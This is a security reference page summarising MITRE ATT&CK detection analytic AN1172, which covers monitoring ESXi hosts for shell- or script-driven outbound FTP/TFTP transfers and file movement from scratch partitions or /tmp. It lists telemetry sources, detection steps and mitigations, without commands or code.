AN1172: Analytic 1172
Detects file movement or outbound TFTP/FTP transfers from ESXi host initiated via shell commands or injected scripts, particularly from scratch partitions or /tmp.
Analyst context for executives and security teams
AN1172 is a detection analytic for ESXi environments focused on suspicious file movement or outbound TFTP/FTP transfers initiated from shell commands or injected scripts, especially when activity originates from scratch partitions or /tmp. For leaders, the practical issue is visibility into hypervisor-level activity: if ESXi hosts can move files outward without strong monitoring, an incident may affect virtualization infrastructure before normal endpoint controls see it.
Executive priority
Prioritize this analytic where ESXi supports critical workloads. The business question is whether the organization can produce evidence of unusual shell-driven file movement and outbound FTP/TFTP activity from hypervisors during an incident or audit. This matters for operational resilience, incident response readiness, and control assurance around systems that may sit outside standard endpoint monitoring coverage.
Technical view
SOC and IR teams should validate whether ESXi host telemetry can show shell command execution, script-driven activity, file movement from scratch partitions and /tmp, and outbound FTP or TFTP network connections. Because ATT&CK provides no detailed detection logic for this analytic, teams should treat AN1172 as a coverage objective rather than a finished rule: confirm data sources, define expected administrative behavior, and tune for unusual source paths, transfer protocols, and command contexts on ESXi.
Likely telemetry
- ESXi shell command history or command execution logs where available
- Host file activity involving scratch partitions
- Host file activity involving /tmp
- Outbound network connection records from ESXi hosts
- FTP traffic from ESXi hosts
Detection direction
- Validate that ESXi hosts are included in logging and monitoring scope, not only guest virtual machines.
- Look for outbound FTP/TFTP transfers initiated from ESXi shell commands or scripts, with attention to activity involving scratch partitions or /tmp.
- Baseline legitimate administrative file transfers to reduce false positives from maintenance, backup, or support workflows.
- Investigate whether telemetry distinguishes interactive shell use from scripted or injected execution.
- Identify blind spots where hypervisor logs, network egress records, or temporary-directory file activity are not retained or centralized.
Mitigation priorities
- Restrict and monitor ESXi shell access according to operational need.
- Control outbound network paths from ESXi hosts, especially FTP and TFTP where not required.
- Harden administrative workflows so file movement from hypervisors is authorized, logged, and reviewable.
- Ensure incident response procedures include ESXi host evidence collection, not only VM or endpoint artifacts.
- Maintain retention and centralization of relevant ESXi and network telemetry for investigation and compliance evidence.
Analyst notes and limits
The supplied ATT&CK object is a detection analytic, not a technique, and includes no tactic mapping or relationship context. Its value is primarily as a validation prompt for ESXi monitoring coverage around file movement and outbound FTP/TFTP behavior from shell or script contexts.
Official detection logic was not provided, and no relationships were supplied. This take therefore does not assert specific detection fidelity, adversary use, impact, or coverage. Local ESXi configuration, logging availability, and approved administrative transfer patterns are required to operationalize the analytic.
Analytic 1172
Detects file movement or outbound TFTP/FTP transfers from ESXi host initiated via shell commands or injected scripts, particularly from scratch partitions or /tmp.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 0709538f1a9b… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack AN1172Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.